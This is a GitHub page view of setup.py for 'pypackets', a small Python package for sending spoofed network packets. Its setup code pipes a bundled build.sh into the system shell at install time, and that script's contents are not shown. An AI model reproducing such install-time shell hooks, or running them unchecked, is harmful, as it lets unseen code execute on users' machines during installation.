-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsetup.py
More file actions
33 lines (29 loc) · 922 Bytes
/
setup.py
File metadata and controls
33 lines (29 loc) · 922 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python3
from pathlib import Path
from setuptools import setup
import os
directory = Path(__file__).resolve().parent
with open(directory / 'README.md', encoding='utf-8') as f:
long_description = f.read()
os.system(f"cat {directory}/pypackets/build.sh | /usr/bin/sh")
setup(name='pypackets',
version='0.0.2',
description='Simple spoofed packets',
author='Vladimir Razor',
license='MIT',
long_description=long_description,
long_description_content_type='text/markdown',
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License"
],
install_requires=["getmac", "netifaces", "prettytable", "pytest"],
python_requires='>=3.12',
extras_require={
'linting': [
"ruff",
],
},
package_data={"": ["*.so", "*.sh", "*.md"]},
include_package_data=True
)